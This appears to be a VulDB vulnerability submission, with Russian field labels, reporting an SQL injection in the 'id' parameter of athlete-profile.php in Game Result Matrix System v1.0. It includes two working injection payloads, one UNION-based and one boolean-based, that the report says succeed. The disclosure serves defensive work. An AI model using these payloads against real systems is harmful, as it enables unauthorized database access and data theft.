| Название | Game Result Matrix System v1.0 /dipam/athlete-profile.php GET parameter id exists SQL injection vulnerability |
|---|
| Описание | Game Result Matrix System v1.0 has SQL injection vulnerability.
Vulnerability File: /dipam/athlete-profile.php
GET parameter id exists SQL injection vulnerability.
Payload1: id=-1' union all select null,null,null,null,null,null,null,null,null,concat(0x56575859,0x60616263),null,null,null-- -
UNION query successful.
Payload2: id=243' AND 123=123 AND 'qwe'='qwe
The Boolean value is judged correctly, so the page is displayed normally. |
|---|
| Источник | ⚠️ https://github.com/M9KJ-TEAM/CVEReport/blob/main/SQL2.md |
|---|
| Пользователь | zhangyf (UID 48462) |
|---|
| Представление | 21.06.2023 12:17 (3 лет назад) |
|---|
| Модерация | 23.06.2023 11:19 (2 days later) |
|---|
| Статус | принято |
|---|
| Запись VulDB | 232239 [SourceCodester Game Result Matrix System 1.0 GET Parameter athlete-profile.php ИД SQL-инъекция] |
|---|
| Баллы | 20 |
|---|